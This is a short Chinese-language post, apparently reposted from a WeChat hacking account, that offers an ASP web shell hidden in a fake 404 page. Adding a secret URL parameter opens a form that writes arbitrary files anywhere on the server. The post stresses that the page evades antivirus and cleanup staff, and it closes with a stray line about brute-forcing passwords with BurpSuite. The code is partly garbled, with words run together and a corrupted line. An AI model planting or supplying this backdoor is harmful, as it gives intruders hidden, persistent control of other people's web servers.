隐蔽的404后门

摘自微信“黑白之道”

<% ifrequest("77169")="77169" then %>
<title>77169</title>
<%="<br>"%>
<%="Thefile location：" server.mappath(request.servervariables("script_name"))%>
<%DimobjFSO%>
<%Dim fdata%>
<%DimobjCountFile%>
<%on errorresume next%>
<%Set objFSO= Server.CreateObject("Scripting.FileSystemObject")%>
<%ifTrim(request("syfdpath"))<>"" then%>
<�ata =request("cyfddata")%>
<%SetobjCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Writefdata%>
<%if err =0then%>
<fontcolor=red>save!</font>
<%end if%>
<%end if%>
<%objCountFile.Close%>
<%SetobjCountFile=Nothing%>
<%Set objFSO= Nothing%>
<formaction='' method=post>
<p>
    <input type=text name=syfdpath width=32value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"style="border:solid 1px" size=80>
</p>
<p>
      <textarea name=cyfddata cols=80rows=10 width=32 style="border:solid 1px"></textarea>
</p>
    <input type=submit value=savestyle="border:solid 1px">
    <fontcolor="#FF0000"><strong>                                    华夏黑客同盟</strong></font> </p>
</form><formaction="" method="post">
<% end if%>

 把源码复制下来保存到本地asp格式

我们访问404页面返回的还是404

莫慌，

在url后面加上？77169=77169

 

 接下来就可以操作了。一般病毒木马查杀人员应该很难想到404页面吧

 

 

MD5网站结合BurpSuite批量爆破密码